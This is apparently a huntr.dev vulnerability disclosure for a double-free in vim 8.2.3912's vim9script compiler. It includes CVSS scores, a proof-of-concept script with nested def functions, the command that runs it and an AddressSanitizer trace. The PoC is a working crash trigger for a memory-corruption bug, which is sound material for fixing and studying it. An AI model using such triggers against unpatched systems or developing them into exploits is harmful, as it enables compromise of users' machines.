Lucene search

K
huntrBrenuA8BEE03A-6E2E-43BF-BEE3-4968C5386A2E
HistoryDec 27, 2021 - 3:57 p.m.

None in vim/vim

2021-12-2715:57:37
brenu
www.huntr.dev
7

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

40.3%

Description

Hello there! Hope you are having an awesome day! 🤗

After I saw the last Rick de Jager’s report, I decided to pick up their PoC as a valid input for fuzzing vim on its patch 8.2.3912, and ended up finding a new case of double-free!

For testing, I compiled vim with GCC 9.3.0, and my O.S. is a Linux Mint 20.04 amd64

Steps to Reproduce

Save the following file as poc:

def FirstFunction()
  def SecondFunction(
  )
  # Notice that the issue still happens if the right parenthesis
  # of the second function ends up on the next line
   
   enddef|BBBB
enddef
# Compile all functions
defcompile

After that, run vim with the following command:

vim -u NONE -X -Z -e -s -S poc -c :qa!

Running this should result in a double-free detected.

vim -u NONE -X -Z -e -s -S poc -c :qa!
free(): double free detected in tcache 2
Aborted (core dumped)

Asan Log

=================================================================
==802955==ERROR: AddressSanitizer: attempting double-free on 0x604000000410 in thread T0:
    #0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
    #1 0x11f3de5 in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
    #2 0x11f3de5 in get_function_body /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:843:8
    #3 0x121b313 in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4371:9
    #4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
    #5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
    #6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
    #7 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
    #8 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
    #9 0xef5d80 in do_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1423:5
    #10 0xf035b7 in cmd_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:985:14
    #11 0xf035b7 in ex_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1011:2
    #12 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
    #13 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
    #14 0x14c1e61 in do_cmdline_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:588:12
    #15 0x14c1e61 in exe_commands /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:3080:2
    #16 0x14c1e61 in vim_main2 /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:774:2
    #17 0x14b9920 in main /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:426:12
    #18 0x7fd8d254a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x3cfced in _start (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x3cfced)

0x604000000410 is located 0 bytes inside of 34-byte region [0x604000000410,0x604000000432)
freed by thread T0 here:
    #0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
    #1 0x11ea6ed in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
    #2 0x11ea6ed in get_function_args /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:221:6
    #3 0x1219def in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4258:9
    #4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
    #5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
    #6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9

previously allocated by thread T0 here:
    #0 0x449d5d in malloc (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449d5d)
    #1 0x47d1d6 in lalloc /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:244:11

SUMMARY: AddressSanitizer: double-free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add) in free
==802955==ABORTING

Impact

Use after free’s / double free’s can cause in memory corruption, that can cause a crash or other undefined (potentially exploitable) behaviour.

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

40.3%

Related for A8BEE03A-6E2E-43BF-BEE3-4968C5386A2E